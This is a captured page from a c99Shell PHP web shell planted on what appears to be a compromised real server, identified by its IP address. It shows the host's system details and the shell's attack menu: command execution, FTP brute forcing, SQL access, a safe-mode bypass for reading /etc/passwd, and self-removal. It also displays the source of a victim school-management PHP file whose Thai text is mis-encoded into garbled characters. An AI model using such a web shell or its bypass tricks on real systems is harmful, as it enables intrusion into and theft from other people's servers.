110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/person/ drwxr-xr-x Free 52.61 GB of 127.8 GB (41.17%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/person/ drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: InsertFormProject.php (4.38 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../include/Function.php" );
		require_once( "../include/FunctionDB.php" );
	
		/**  Create Database Object  */
		$dbObj = new DBConn;
		/**  Config Table for This Page  */
		$myTable1 = "personal_tb";
		$myTable2 = " formproject";
		$myTable2PK = "proId";
		
		$Teacher_code = $_POST['Teacher_code'];
		$code = $_POST['code'];
		$ProjectId = $_POST['ProjectId'];
		//$Date = $_POST['mYear']."-".$_POST['mMonth']."-".$_POST['mDate'];
		$Date = dmyE2ymdT($_REQUEST['mDate']);
		$Training_name = trim( $_POST['Training_name'] );  //ўНН№ШБСµФ
		$Year_std = trim( $_POST['Year_std'] );                          // 
		$TeacherId = $_POST['TeacherId'];
		$Budget_use = trim( $_POST['Budget_use'] );                 //
		$Project_plan = trim( $_POST['Project_plan'] );                //ГТВЕРаНХВґ 
		$Flag2 = 'ГНН№ШБСµФ' ;
		
		///*-------- №У¤иТ id БТаѕФиБгЛйЎСє¤иТГЛСК¤ГСй§ЕР1 -----------*// 
	  	 $query = " SELECT *  FROM  $myTable2  ORDER  BY proId  DESC ";
          $result = $dbObj->execQuery($query);
	     $rss= $dbObj->fetchArray($result);
         $myTable2  = $rss[0]+1 ; // №У¤иТ id БТаѕФиБгЛйЎСє¤иТГЛСККБТЄФЎ¤ГСй§ЕР1
         $proNo = "$project$myTable2" ;
		 $Spending_use ="$Budget_use";
		 
		
		
		InsertFormProject( $Teacher_code, $code, $Orderlist, $Project_plan, $ProjectId,  $Date,$Training_name, $Year_std, $TeacherId, $Flag  ,$Flag1, $Flag2, $Budget_use, $Spending_use , $proNo );  
	   	$proId = mysql_insert_id();
		InsertProject(  $Ind, $ProjectId, $Project_code, $ProjectNo, $MoneyId, $MoneyS_C,  $programId, $Orderlist ,$Faculty_code, $Teacher_code, $Orderlist_2,   $Training_name ,$Project_plan, $Date, $Budget_use, $Spending_use, $Budget_Year, $Year , $Training_code ,$Flag , $proId  );
		
	} # else
 ?>






MIS -- Teacher





  
    
    
      
      
      
         
      
      
        Л№йТЛЕСЎ » бєєїНГмБГТЄЎТГ » гєўНН№ШБСµФд»ГТЄЎТГ
      
      
         
      
      
        ГРєєЁСґаЎзєўйНБЩЕўН§·иТ№аГХВєГйНВбЕйЗ

          ЎГШіТГНКйЎ¤ГЩи ЎУЕС§а»ЕХиВ№Л№йТНСµв№БСµФ

          "; ?>
      
      
         
      
    
   
  




freeresult($result);
	
	/**  Close the Database  */
	$dbObj->disconn();
	
	/**  Unset Class  */
	unset($dbObj);
?>
bool(false)

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--